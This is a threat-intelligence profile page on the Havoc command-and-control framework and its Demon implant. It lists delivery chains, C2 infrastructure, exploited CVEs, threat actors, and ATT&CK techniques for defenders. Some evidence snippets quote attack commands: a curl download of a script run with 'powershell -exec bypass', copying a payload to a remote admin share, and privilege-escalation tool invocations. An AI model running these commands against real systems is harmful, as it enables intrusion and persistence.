MalwareRansomwareUsed by 19 actorsExploits 3 CVEs

Havoc

Also known ashavoc_c2havoc_c2_framework

Havoc is an open-source post-exploitation command-and-control framework used by red teams and increasingly adopted by threat actors as an alternative to Cobalt Strike, Sliver, and Brute Ratel. Its implant is commonly referred to as Demon. Reported capabilities include command execution, host enumeration, encrypted command/result handling, and support for persistent access and payload delivery. Content also attributes evasion and anti-analysis features to Havoc or Havoc-derived agents, including indirect syscalls, sleep obfuscation, encrypted memory images, indirect API calls, and API resolution by hash.

Across the provided reporting, Havoc was deployed on Windows systems through multiple infection and execution chains: phishing-delivered ZIP archives containing a decoy document and malicious screen-saver; Windows LNK shortcut chains that launched PowerShell or other LOLBIN-assisted stagers and then executed CPL/DLL payloads to return a Havoc beacon; VBScript-to-PowerShell-to-.NET in-memory loaders that executed Demon without dropping the implant to disk; DLL sideloading via trusted signed applications; malicious npm package delivery; and web-shell-enabled deployment on compromised servers. One Brazil-focused campaign used invoice-themed ZIP files containing a VBScript downloader and MSI package that side-loaded a malicious DLL stager, which then fetched Havoc Demon over the network and persisted via HKCU\Environment\UserInitMprLogonScript. Another observed chain used registry-staged encrypted configuration reconstructed in memory by a sideloaded intermediary loader, behavior explicitly aligned with Havoc.

Observed behavior includes HTTP/HTTPS-based C2 communications and periodic beaconing. Specific network and configuration artifacts directly mentioned in the content include a Havoc stager using GET /stage/ and POST /api/v2/telemetry/diag with user-agent Microsoft-Delivery-Optimization/10.1 to 194.59.31.192:8443; associated mutex Global{7f3a9c2e-4b1d-8e5f-a6d0-3c9b2e1f7a4d}; and recovered Demon configurations using HTTP POST / or /api with a Chrome-like user-agent. Additional reported C2 or callback infrastructure associated with Havoc deployments includes 107.148.41.114, 77.72.85.62, 143.198.183.46, 194.62.55.81:80, 64.176.37.107:443, and 45.77.46.245:443. One report identified a Havoc C2 teamserver at 217.154.217.139 with redirector 217.154.162.45 and TLS CN wawsenti.duckdns.org.

Threat activity in the content links Havoc to multiple actors and campaigns. Sophos reported Cluster Charlie in Operation Crimson Palace, assessed as part of a Chinese state-directed cyberespionage campaign targeting a Southeast Asian government agency and related regional organizations, using Havoc via web shells, DLL sideloading, and repeated redeployment. Cato documented a French-speaking actor tracked as Poisson using a multi-stage in-memory chain ending in Havoc Demon against a small French automotive business, alongside scheduled-task persistence, Explorer.exe injection, RustDesk, OpenSSH Server, and Tailscale. CTU reporting tied Havoc use to GOLD ENCOUNTER/PayoutsKing ransomware intrusions, where it was launched via DLL sideloading and accompanied by SSH backdoors through AdaptixC2 or OpenSSH. Additional reporting associated Havoc with campaigns against a government organization, Brazilian invoice-themed phishing, and pro-Ukrainian hacktivist-linked intrusions where a payload named demon.x64.exe communicated with 77.72.85.62.

Targeting reflected in the content spans government, public service, automotive, healthcare, aviation, and broader enterprise environments, primarily on Windows, with some references to operators already having a Havoc agent on macOS and to HTTP-based C2 on Linux servers. A Havoc-derived private Mythic-compatible backdoor named Loki was reported targeting more than a dozen Russian companies; researchers stated Loki inherited Havoc techniques such as encrypted memory, indirect API calls, and hashed API lookup.

High-confidence indicators and artifacts directly mentioned include the names Demon and demon.x64.exe; C2 IPs/domains 194.59.31.192, 107.148.41.114, 77.72.85.62, 143.198.183.46, 194.62.55.81, 64.176.37.107, 45.77.46.245, 217.154.217.139, 217.154.162.45, and wawsenti.duckdns.org; URIs /stage/, /api/v2/telemetry/diag, /, and /api; user-agents Microsoft-Delivery-Optimization/10.1 and Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36; and persistence via scheduled tasks, startup shortcuts, Explorer.exe injection, and HKCU\Environment\UserInitMprLogonScript.

For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

Start free trial

EXPLOITED CVES

Vulnerabilities exploited

3 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.

3 CVES

CVE-2026-3502TrueConf Client Update Integrity Check Bypass Leading to Arbitrary Code ExecutionExploited in the wild

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a flaw in TrueConf Client, tracked as CVE-2026-3502 (CVSS score of 7.8), to its Known Exploited Vulnerabilities (KEV) catalog. CVE-2026-3502 is a flaw in TrueConf Client that allows it to download and install updates without verifying them. Attackers who can tamper with the update source can deliver malicious files, leading to arbitrary code execution on the system. | Attackers replaced update files with malicious ones, tricking users into installing them. This delivered the Havoc framework, enabling control, surveillance, and persistence.

via security affairssecurityaffairs.com

CVE-2025-61932RCE in MOTEX LANSCOPE Endpoint Manager On-Premises MR/DAExploited in the wild

Researchers at Sophos recently discovered that in mid-2025, Bronze Butler (a.k.a. Tick, RedBaldKnight, Stalker Panda, Swirl Typhoon) exploited a critical vulnerability in Lanscope when it was still a zero-day... Motex disclosed a vulnerability designated CVE-2025-61932... Motex has released a fix... CISA added CVE-2025-61932 to its Known Exploited Vulnerabilities (KEV) catalog.

via dark readingdarkreading.com

CVE-2025-8088WinRAR Windows Path Traversal via NTFS Alternate Data StreamsExploited in the wild

Attack chains mounted by the adversary have been found to abuse CVE-2025-8088, a now-patched security flaw impacting RARLAB WinRAR that allows for arbitrary code execution when specially crafted archives are opened by targets. The exploitation of the vulnerability was observed about eight days after its public disclosure in August.

via the hacker newsthehackernews.com

THREAT ACTORS

Groups observed using it

19 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.

View more details

GOLD ENCOUNTER

The group has also used a DLL sideloading technique to launch the Havoc C2 post-exploitation framework, and establishes an SSH backdoor via AdaptixC2 or OpenSSH.

via sophos othersophos.com

TeamPCP

Havoc C2 for post-exploitation tasks like pivoting through compromised hosts into internal networks, privilege escalation, and maintaining stealth

via theravenfile blogtheravenfile.com

Amaranth-Dragon

The TrueChaos campaign has been found to weaponize this flaw in the update mechanism to likely deploy the open-source Havoc command-and-control (C2) framework to vulnerable endpoints.

via the hacker newsthehackernews.com

Fox Kitten

The group uses a combination of living-off-the-land tools (like ligolo, socat, proxychains) and post-exploitation frameworks (like Havoc, MeshCentral, and custom C2 binaries) across Linux and cloud systems.

via sysdig blogwebflow.sysdig.com

FIN7

What once ended with a $300 gift card purchase now ends with a modified Havoc C2 framework burrowed into your environment... deploying a mix of custom Havoc Demon payloads...

via huntress bloghuntress.com

KTA440

"...used to execute the Havoc command-and-control (C2) framework."

via the hacker newsthehackernews.com

+13 more in the app

MITRE ATT&CK

Techniques & procedures

27 distinct techniques documented for this family, organized by ATT&CK tactic.

Reconnaissance

1 technique

T1598Phishing for InformationEvidence1

What we are going to do is phish the local admin for their credentials, store them in PowerShell and then relay those credentials to run a scheduled task that calls our beacon in higher integrity.

Initial Access

1 technique

T1133External Remote ServicesEvidence1

The most significant aspect of the attack was the attacker's installation of OpenSSH Server and Tailscale on a victim's machine, creating a covert access channel independent of the command-and-control server. Even after the Havoc infrastructure went offline, the attacker maintained access through this separate, encrypted mesh network.

Execution

6 techniques

T1047Windows Management InstrumentationEvidence1

the attackers used a command shell session spawned from the malicious DLL to move laterally via WMIC, and to deploy the open-source SharpHound tool...

T1053.005Scheduled TaskEvidence3

That username and password is then passed to schtasks to schedule a task that executes our APCTest.exe executable at a specified time.

T1059.001PowerShellEvidence4

We can simply run this script using invoke-expression since Havoc doesn’t have a PowerShell-Import function. I host the script and IEX it through Havoc.

T1059.003Windows Command ShellEvidence1

the attackers used the shell to execute commands on the targeted web app server... /c wevtutil qe ... /c WMIC ... findstr /i /c:exclude /c:whitelist /c:blocklist

T1059.005Visual BasicEvidence2

The attacker utilized a multi-stage in-memory malware chain, including a VBScript stager, a PowerShell loader, and Havoc's Demon agent, to gain initial access.

T1574.001DLLEvidence2

Windows 11 Mock Directory UAC Bypass Using DLL Hijacking ... For this demo we are going to use one of the ComputerDefaults.exe DLLs ... if we put a malicious DLL file in that directory ... the service will start and run our DLL with the privileges of that service.

Persistence

4 techniques

T1053.005Scheduled TaskEvidence3

That username and password is then passed to schtasks to schedule a task that executes our APCTest.exe executable at a specified time.

T1133External Remote ServicesEvidence1

T1505.003Web ShellEvidence2

Using previously stolen credentials, the attackers deployed a web shell to a web application server using its built-in file upload feature... They then used the web shell to execute commands on the targeted web app server.

T1543.001Launch AgentEvidence1

LaunchAgents - user-level persistence (T1543.001)… LaunchAgent - plist-файл, указывающий launchd запустить определённый бинарь при логине пользователя… SIP не мешает записи в ~/Library/LaunchAgents/.

Privilege Escalation

5 techniques

T1053.005Scheduled TaskEvidence3

That username and password is then passed to schtasks to schedule a task that executes our APCTest.exe executable at a specified time.

T1055Process InjectionEvidence5

After executing the chain, we get a beacon back with our process injected into RuntimeBroker.exe

T1068Exploitation for Privilege EscalationEvidence1

Now that we have a high integrity beacon, we can use the SharpEfsPotato tool to get system ... dotnet inline-execute /home/kali/Desktop/SharpEfsPotato.exe -p C:\Users\User\Downloads\aese.exe ... the last is at System level privileges.

T1543.001Launch AgentEvidence1

T1548.002Bypass User Account ControlEvidence3

The most important thing here is that we did not receive a UAC prompt... it’s interesting that this does get around UAC, even if the box is set to always-notify.

Stealth

9 techniques

T1027Obfuscated Files or InformationEvidence2

Harriet is a payload framework ... The tool will encrypt the shellcode and the function calls ... For this demo, I’m just going to choose the first option, Fully-Automated AES Encryption.

T1027.013Encrypted/Encoded FileEvidence1

Encrypted C2 traffic. A fresh AES key is negotiated at first contact; all later traffic is encrypted.

T1036MasqueradingEvidence2

copying the application’s dynamic linking library (DLL) to a web documents folder and disguising it as a PDF... another malicious DLL masquerading as an .ini file... deployed the XieBroC2 framework as a backup... renamed jconsole.exe, this time renamed firefox.exe

T1036.001Invalid Code SignatureEvidence1

The MSI also has no digital signature ... Only mpextms.exe is signed. The stager DLL is not.

T1055Process InjectionEvidence5

After executing the chain, we get a beacon back with our process injected into RuntimeBroker.exe

T1140Deobfuscate/Decode Files or InformationEvidence1

The VBS hides its intent behind string splitting. Deobfuscated, the VBS launches a hidden cmd that downloads the MSI from Google Cloud Storage

T1218.011Rundll32Evidence1

the threat actor using credentials stolen from an unmanaged device and a dropped web shell. The attackers used the shell to execute rundll32.exe, injecting a malicious Havoc DLL...

T1574.001DLLEvidence2

T1620Reflective Code LoadingEvidence1

We can run this in memory within Havoc using the dotnet command. dotnet inline-execute /home/kali/Desktop/SharpUp.exe audit ... enter the high integrity beacon on your Havoc C2 and run it the same way you ran HighBorn.

Discovery

2 techniques

T1018Remote System DiscoveryEvidence2

the attackers used the Havoc tool to inject code into other processes, which would in turn deploy the open-source SharpHound tool for Active Directory infrastructure mapping.

T1518.001Security Software DiscoveryEvidence1

the injected process used WMIC to query Windows Defender exclusion paths... It also queried the Sophos registry to better understand the “PolicyConfiguration,” “threat policy,” and “Poll Server” Registry values

Lateral Movement

1 technique

T1021.002SMB/Windows Admin SharesEvidence1

cmd /c "copy c:\users\public\temp.log \\172.xxx.xxx.xxx\c$\windows\temp && copy c:\users\public\pp.exe\\172.xxx.xxx.xxx \c$\perflogs\conhost.exe"

Command and Control

3 techniques

T1071Application Layer ProtocolEvidence5

This resulted in a callback to Havoc.

T1090ProxyEvidence1

По MITRE ATT&CK это конкретные техники: Proxy ( T1090, Command and Control ) - маршрутизация C2-трафика через промежуточный узел

T1105Ingress Tool TransferEvidence3

cd C:\Windows\Tasks\; curl -o runner.ps1 http://192.168.1.29:9090/runner.md; powershell -exec bypass .\runner.ps1

Exfiltration

1 technique

T1041Exfiltration Over C2 ChannelEvidence1

Exfiltration of data of intelligence value was still an objective after the resumption of activity.

INDICATORS OF COMPROMISE

IOCs tracked for this family

75 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

View more in app

Network

28 tracked

IPs, domains, and DNS infrastructure linked to this family.

Hashes

41 tracked

File hashes (MD5, SHA-1, SHA-256) from samples and reports.

Other

6 tracked

Other indicator types observed in public reporting.

TypeValueLatest sighting

domain●●●●●●●●●●●●View more in app3 days ago

hash.sha256●●●●●●●●●●●●View more in app3 days ago

ip.v4●●●●●●●●●●●●View more in app12 days ago

ip.v4●●●●●●●●●●●●View more in app14 days ago

ACTIVITY FEED

Recent activity

88 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

88 SOURCESView more in app

codebyNews

Jun 21, 2026

Persistence macOS: техники закрепления для Red Team

C2 framework/agent referenced as an example payload used after initial access on macOS.

scworldNews

Jun 18, 2026

Attacker establishes persistent access to French business using OpenSSH and Tailscale | brief | SC Media

An adversary emulation/C2 framework whose Demon agent was used as part of a multi-stage in-memory intrusion chain to establish control on victim machines. In this case, access persisted even after the Havoc infrastructure went offline because the attacker also installed alternative remote access mechanisms.

censys blogNews

Jun 17, 2026

AdaptixC2: Fingerprinting an Open-Source C2 Framework at Scale - Censys

Referenced as another known post-exploitation framework for comparison with AdaptixC2.

the hacker newsNews

Jun 17, 2026

Junior Hacker Used Tailscale and OpenSSH to Keep Access After His C2 Went Offline

Havoc was used as the in-memory command-and-control implant in the intrusion, with its Demon agent executed via a VBScript/PowerShell/.NET loader chain and later reconnecting automatically when the C2 infrastructure returned.

+84 more in the timeline

What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.

Start free trial

IOC matching75

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution19

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities3

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping27

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.